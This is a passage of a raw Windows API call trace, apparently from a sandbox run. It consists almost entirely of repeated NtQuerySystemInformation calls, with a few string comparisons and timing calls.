Length=0x0, ResultLength=0x0) [0269.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc820, Length=0x38, ResultLength=0x0) [0269.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6a0, Length=0x20, ResultLength=0x0) [0269.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc630, Length=0x20, ResultLength=0x0) [0269.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc630, Length=0x20, ResultLength=0x0) [0269.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc08, Length=0x50, ResultLength=0x0) [0269.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb80, Length=0x28, ResultLength=0x0) [0269.388] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0269.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc08, Length=0x50, ResultLength=0x0) [0269.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc08, Length=0x50, ResultLength=0x0) [0269.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcaf0, Length=0x50, ResultLength=0x0) [0269.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0269.388] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0269.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcaf0, Length=0x50, ResultLength=0x0) [0269.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcaf0, Length=0x50, ResultLength=0x0) [0269.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcaf0, Length=0x50, ResultLength=0x0) [0269.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca20, Length=0x38, ResultLength=0x0) [0269.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc850, Length=0x28, ResultLength=0x0) [0269.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc850, Length=0x28, ResultLength=0x0) [0269.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc850, Length=0x28, ResultLength=0x0) [0269.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8c0, Length=0x28, ResultLength=0x0) [0269.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca20, Length=0x38, ResultLength=0x0) [0269.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc940, Length=0x28, ResultLength=0x0) [0269.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc940, Length=0x28, ResultLength=0x0) [0269.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca20, Length=0x38, ResultLength=0x0) [0269.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8a0, Length=0x20, ResultLength=0x0) [0269.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc820, Length=0x20, ResultLength=0x0) [0269.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc820, Length=0x20, ResultLength=0x0) [0269.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc820, Length=0x20, ResultLength=0x0) [0269.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca20, Length=0x38, ResultLength=0x0) [0269.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8a0, Length=0x20, ResultLength=0x0) [0269.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x20, ResultLength=0x0) [0269.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x20, ResultLength=0x0) [0269.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.399] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc751dfcb50 | out: lpSystemTimeAsFileTime=0xc751dfcb50*(dwLowDateTime=0x1d99e57, dwHighDateTime=0x1d5fb6f)) [0269.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc08, Length=0x50, ResultLength=0x0) [0269.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb40, Length=0x28, ResultLength=0x0) [0269.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca58, Length=0x50, ResultLength=0x0) [0269.399] GetTickCount () returned 0x1183ac5 [0269.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc928, Length=0x58, ResultLength=0x0) [0269.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x38, ResultLength=0x0) [0269.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc670, Length=0x28, ResultLength=0x0) [0269.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc670, Length=0x28, ResultLength=0x0) [0269.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc670, Length=0x28, ResultLength=0x0) [0269.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc670, Length=0x28, ResultLength=0x0) [0269.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x28, ResultLength=0x0) [0269.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x38, ResultLength=0x0) [0269.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc760, Length=0x28, ResultLength=0x0) [0269.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc760, Length=0x28, ResultLength=0x0) [0269.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x38, ResultLength=0x0) [0269.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6c0, Length=0x20, ResultLength=0x0) [0269.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x20, ResultLength=0x0) [0269.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x20, ResultLength=0x0) [0269.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x20, ResultLength=0x0) [0269.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x38, ResultLength=0x0) [0269.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6c0, Length=0x20, ResultLength=0x0) [0269.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x20, ResultLength=0x0) [0269.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x20, ResultLength=0x0) [0269.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc928, Length=0x58, ResultLength=0x0) [0269.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x38, ResultLength=0x0) [0269.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x28, ResultLength=0x0) [0269.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x28, ResultLength=0x0) [0269.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x28, ResultLength=0x0) [0269.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x28, ResultLength=0x0) [0269.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6b0, Length=0x28, ResultLength=0x0) [0269.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x38, ResultLength=0x0) [0269.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x38, ResultLength=0x0) [0269.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x28, ResultLength=0x0) [0269.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x28, ResultLength=0x0) [0269.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x38, ResultLength=0x0) [0269.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x38, ResultLength=0x0) [0269.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5a0, Length=0x20, ResultLength=0x0) [0269.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0269.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0269.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0269.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc770, Length=0x20, ResultLength=0x0) [0269.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x38, ResultLength=0x0) [0269.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x20, ResultLength=0x0) [0269.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x20, ResultLength=0x0) [0269.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x20, ResultLength=0x0) [0269.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x20, ResultLength=0x0) [0269.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x38, ResultLength=0x0) [0269.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x20, ResultLength=0x0) [0269.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x20, ResultLength=0x0) [0269.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x20, ResultLength=0x0) [0269.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x20, ResultLength=0x0) [0269.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x38, ResultLength=0x0) [0269.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x20, ResultLength=0x0) [0269.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x20, ResultLength=0x0) [0269.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x20, ResultLength=0x0) [0269.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc928, Length=0x58, ResultLength=0x0) [0269.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7f0, Length=0x58, ResultLength=0x0) [0269.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x38, ResultLength=0x0) [0269.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.422] NtQuerySystemInformation 